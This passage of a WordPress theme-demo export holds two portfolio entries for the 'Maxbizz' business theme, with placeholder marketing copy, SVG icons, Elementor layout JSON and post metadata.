							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>806</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:41:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:41:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[money-market]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[807]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"16f55f4a","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"418cd74c","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1ea00633","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1aec01ac","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"54e30f49","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"3f7f7a0b","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"768a37c4","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bf03c4e","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"14cfe9ce","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3803acb8","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"43e55b12","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"6e436e0b","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6c09acaf","elType":"widget","settings":{"editor":"<p>April 12, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7c3887","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"63f2a3ed","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"132a8999","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"73f1d5f9","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"116d0b4d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"b61e92c","elType":"section","settings":[],"elements":[{"id":"418cdaf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"f7f3a40","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b1f1ea0","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"2d88c0d","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"1a7c250","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"801a5f6","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"985b000","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"13c8be1","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"4e42c18","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"36e40cd","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"a77597b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"b7f0784","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6b7f82f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"1329939","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"07e8ecf","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"15132e0","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"e29c15e","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"990480d","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b6e7939","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"e7ca6b9","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"2f6620f","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"d7d5b83","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"4b7f1f6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"5e80a18","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>OCT Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/oct-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 04:45:16 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=810</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>May 22, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>810</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:45:16]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:45:16]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[oct-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
